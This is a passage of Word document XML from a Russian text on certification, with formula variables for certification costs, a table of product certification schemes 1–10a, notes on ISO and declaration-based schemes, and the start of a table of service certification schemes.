      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>o.с.i</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- трудоемкость обязательной сертификации конкретной продукции по схеме сертификации, чел./дн.;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Т - средняя дневная ставка специалиста, р.;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>К</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>н.з.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- норматив начислений на заработную плату, установленный действующим законодательством, %;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>К</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>н.р.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - коэффициент накладных расходов,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Р - уровень рентабельности, %.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Значения трудоемкости варьируются в зависимости от применяемой схемы сертификации и приведены в табл. 1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Таблица 1</w:t>
      </w:r>
      <w:r w:rsidR="00E73975" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Схемы сертификации продукции</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="10227" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="888"/>
        <w:gridCol w:w="1945"/>
        <w:gridCol w:w="2898"/>
        <w:gridCol w:w="4496"/>
      </w:tblGrid>
      <w:tr w:rsidR="007F3F21" w:rsidRPr="00617AC0" w:rsidTr="00B4722D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="776"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Номер схемы</w:t>
            </w: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Проверка производства</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Инспекционный контроль сертифицированной продукции</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типа</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типа</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образцов, взятых у продавца</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3F21" w:rsidRPr="00617AC0" w:rsidTr="00B4722D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="776"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2а</w:t>
            </w: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типа</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Анализ состояния производства</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образцов, взятых у продавца</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типа</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образцов, взятых у изготовителя</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3F21" w:rsidRPr="00617AC0" w:rsidTr="00B4722D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="776"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3а</w:t>
            </w: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типа</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Анализ состояния производства</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образцов, взятых у изготовителя</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типа</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образцов, взятых у продавца и изготовителя</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3F21" w:rsidRPr="00617AC0" w:rsidTr="00B4722D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="776"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4а</w:t>
            </w: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типа</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Анализ состояния производства</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образцов, взятых у продавца и изготовителя</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типа</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Сертификация производства (системы качества) у изготовителя</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образцов, взятых у продавца. Испытания образцов, взятых у изготовителя. Анализ состояния производства</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Рассмотрение декларации о соответствии</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Сертификация системы качества у изготовителя</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Контроль за стабильностью функционирования системы качества</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партии</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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4563"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Испытания каждого образца</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2934"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4563"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Рассмотрение декларации о соответствии</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2934"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4563"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3F21" w:rsidRPr="00617AC0" w:rsidTr="00B4722D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="776"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9а</w:t>
            </w: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Рассмотрение декларации о соответствии</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="293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Анализ состояния производства</w:t>
            </w:r>
            <w:r w:rsidR="00B012EC" w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4563"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3F21" w:rsidRPr="00617AC0" w:rsidTr="00B4722D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="776" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="007F3F21" w:rsidRPr="00617AC0" w:rsidRDefault="007F3F21" w:rsidP="00990861">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1954" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="007F3F21" w:rsidRPr="00617AC0" w:rsidRDefault="007F3F21" w:rsidP="00990861">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Рассмотрение декларации о соответствии</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2934"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4563"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3F21" w:rsidRPr="00617AC0" w:rsidTr="00B4722D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="776"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10а</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1954"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Рассмотрение декларации о соответствии</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2934"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Анализ состояния производства</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4563" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="007F3F21" w:rsidRPr="00617AC0" w:rsidRDefault="00B012EC" w:rsidP="00990861">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="007F3F21" w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Примечания</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Под испытанием типа понимается испытание типового образца продукции с целью распространения результатов испытаний на всю совокупность. Рассмотрение декларации о соответствии проводится вместе с прилагаемыми документами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Как видно из таблицы, схемы сертификации различаются объемом и способами проводимых органами сертификации работ, а также инспекционного контроля. Схемы 1-8 классифицированы ИСО и общеприняты в международной практике. Схемы 9-10а основаны на использовании Декларации поставщика о соответствии продукции, как принятой в странах ЕС практике подтверждения соответствия продукции установленным требованиям. От выбора схемы сертификации зависит степень доказательности результатов сертификации, уверенности ОС в надежности выданных сертификатов. При выборе схемы нужно учитывать состояние производства, серийность продукции, конструктивную сложность изделий.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Таблица 2</w:t>
      </w:r>
      <w:r w:rsidR="00E73975" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Схемы сертификации услуг</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="9784" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="817"/>
        <w:gridCol w:w="1418"/>
        <w:gridCol w:w="992"/>
        <w:gridCol w:w="1417"/>
        <w:gridCol w:w="1560"/>
        <w:gridCol w:w="1275"/>
        <w:gridCol w:w="2305"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidTr="00BE7B15">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="817" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>№ схемы</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Оценка мастерства исполнител</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>я</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Оценка процесса </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>оказания услуги</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Аттестация предприятия</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Сертификация системы качества</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1275" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Выборочная проверка </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>результатов услуги</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2305" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Инспекционный контроль</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidTr="00BE7B15">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="817" w:type="dxa"/>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1418" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992"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417"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560"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275" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2305" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Проверка результата услуги</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidTr="00BE7B15">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="817" w:type="dxa"/>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1418" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992"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417"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560"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275"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2305" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>То же (социолог.оценка )</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidTr="00BE7B15">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="817" w:type="dxa"/>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1418"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992" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417"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560"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275" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2305" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Контроль стабильности процесса</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidTr="00BE7B15">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="817" w:type="dxa"/>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1418"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992" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417"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560"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275"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2305" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Проверка результата услуги</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidTr="00BE7B15">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="817" w:type="dxa"/>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1418"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992"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417" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
